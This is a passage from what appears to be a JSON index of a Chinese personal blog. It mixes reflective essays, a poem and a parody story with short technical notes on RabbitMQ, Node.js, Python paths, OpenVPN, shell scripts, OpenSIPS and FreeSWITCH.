除非生病或者下雨,鲁兵逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 
鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90都神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且任然热爱她。\n","permalink":"https://wdd.js.org/posts/2021/05/vzfo04/","summary":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁兵逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90都神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且任然热爱她。","title":"再读鲁滨逊漂流记: 成年人如何面对孤独"},{"content":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","permalink":"https://wdd.js.org/posts/2021/05/mfh46t/","summary":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","title":"使用AI让卡通人物更加真实"},{"content":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, 
including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.\n连接抖动,就是在单位时间内,有大量的连接产生,也同时有大量的连接关闭。这些抖动将会耗费大量的资源。\n从RabbitMq 3.7.9开始,引入了对抖动数据的统计。在mq管理界面上,可以看到下面的图标。\n下面是随时间变化,mq连接数的抖动情况。\nWhile connection and disconnection rates are system-specific, rates consistently above 100/second likely indicate a suboptimal connection management approach by one or more applications and usually are worth investigating.\n如果抖动的指标持续的超过每秒100个,这就需要引起注意了,需要调查下具体的抖动原因。\n抖动统计 抖动统计包括三个方面\nConnection Channel Queue 参考 https://www.rabbitmq.com/connections.html#high-connection-churn https://www.rabbitmq.com/networking.html#dealing-with-high-connection-churn https://vincent.bernat.ch/en/blog/2014-tcp-time-wait-state-linux https://www.rabbitmq.com/troubleshooting-networking.html#detecting-high-connection-churn ","permalink":"https://wdd.js.org/posts/2021/05/nr1shd/","summary":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.","title":"RabbitMq 大量的连接抖动"},{"content":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 
解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.md drwxr-xr-x 5 wangdd staff 4.0K May 12 02:14 share // bin目录下就是nodejs的可执行程序 ➜ node-v14.17.0-linux-x64 ll bin total 71M -rwxr-xr-x 1 wangdd staff 71M May 12 02:14 node lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npm -\u0026gt; ../lib/node_modules/npm/bin/npm-cli.js lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npx -\u0026gt; ../lib/node_modules/npm/bin/npx-cli.js ➜ node-v14.17.0-linux-x64 ./bin/node --version v14.17.0 通过将bin目录加入到$PATH环境变量中这种方式,就可以直接调用node。\n","permalink":"https://wdd.js.org/fe/install-nodejs-offline/","summary":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 
解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.","title":"离线安装nodejs"},{"content":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了晕晕,在阳光下,放佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋过不像我,我只会心疼哥哥。”\n","permalink":"https://wdd.js.org/posts/2021/05/rhan2i/","summary":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了晕晕,在阳光下,放佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋过不像我,我只会心疼哥哥。”","title":"用古龙的手法 写我只会心疼哥哥"},{"content":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 
下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.8.2 (default, Dec 21 2020, 15:06:04) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin Type \u0026#34;help\u0026#34;, \u0026#34;copyright\u0026#34;, \u0026#34;credits\u0026#34; or \u0026#34;license\u0026#34; for more information. \u0026gt;\u0026gt;\u0026gt; import sys \u0026gt;\u0026gt;\u0026gt; print(sys.path) [\u0026#39;\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python38.zip\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/lib-dynload\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/site-packages\u0026#39;] ➜ pip3 -V pip 21.0.1 from /usr/local/lib/python3.9/site-packages/pip (python 3.9) 问题3: python3.9在哪? 通过上面的命令,就说了我的电脑上有python3.9, 那么实际要克制行文件在哪里呢?\n一般我是用brew安装软件的,brew list\nbrew list - python@3.9 brew info python@3.9 Python has been installed as /usr/local/bin/python3 Unversioned symlinks `python`, `python-config`, `pip` etc. 
pointing to `python3`, `python3-config`, `pip3` etc., respectively, have been installed into /usr/local/opt/python@3.9/libexec/bin 上面的输出中,有两个路径\n/usr/local/bin/python3 试了下这个路径没有文件 /usr/local/opt/python@3.9/libexec/bin 这个文件存在 ➜ bin /usr/local/opt/python@3.9/libexec/bin/python -V Python 3.9.2 将python3 设置为一个别名\nalias python3=\u0026#39;/usr/local/opt/python@3.9/libexec/bin/python\u0026#39; source ~/.zshrc\npython3 wave.py,\n问题解决。\n","permalink":"https://wdd.js.org/posts/2021/05/blzt8r/","summary":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 
由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.","title":"python ModuleNotFoundError"},{"content":" 人生是一场仅与时间为伴的孤独修行\nA《鲁滨逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","permalink":"https://wdd.js.org/posts/2021/05/appxev/","summary":" 人生是一场仅与时间为伴的孤独修行\nA《鲁滨逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","title":"5月书单"},{"content":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 
2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg","title":"openvpn 报错"},{"content":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底的悬崖,另一边上接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来仿佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头\n","permalink":"https://wdd.js.org/posts/2021/04/gbx6x5/","summary":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底的悬崖,另一边上接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来仿佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头","title":"不曾忘的一首小诗"},{"content":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好几遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候。我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在于第一行的这条语句。\n一般情况下我们都是写的/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会报语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以说他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能受到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory. 
\u0026ndash; Wheeler\n总之,我们如果在学习时能够把知识传授给别人,对自己来说也是一种学习。\n参考 https://www.zhihu.com/question/20576786 https://baike.baidu.com/item/%E8%B4%B9%E6%9B%BC%E5%AD%A6%E4%B9%A0%E6%B3%95/50895393 https://www.quora.com/Learning-New-Things/How-can-you-learn-faster/answer/Acaz-Pereira https://www.scientificamerican.com/article/pioneering-physicist-john-wheeler-dies/ ","permalink":"https://wdd.js.org/posts/2021/04/zl6rpy/","summary":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好几遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候。我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在于第一行的这条语句。\n一般情况下我们都是写的/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会报语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到的难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以说他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能受到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory.","title":"从/bin/sh到费曼学习法"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? 
ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/ch8/fork/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 
115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, seeFSCORE-392.\n参考 http://lists.freeswitch.org/pipermail/freeswitch-users/2018-April/129473.html https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files https://tools.ietf.org/html/draft-ietf-sip-100rel-02 https://nickvsnetworking.com/sip-extensions-100rel-sip-rfc3262/ ","permalink":"https://wdd.js.org/opensips/ch9/100-rel/","summary":"sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 
115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission.","title":"sbc 100rel"},{"content":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) != 0) 
{ LM_WARN(\u0026#34;cannot find the phone!\\n\u0026#34;); return -1; } LM_INFO(\u0026#34;zone:%s\\n\u0026#34;, zone.s); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-3/","summary":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) !","title":"ch4-3 $var() 类型的传参"},{"content":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人以为,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干生么呢?\n选择不多。1. 
